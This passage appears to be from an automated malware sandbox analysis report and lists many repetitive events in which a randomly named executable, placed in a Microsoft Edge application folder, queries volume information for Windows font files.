                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
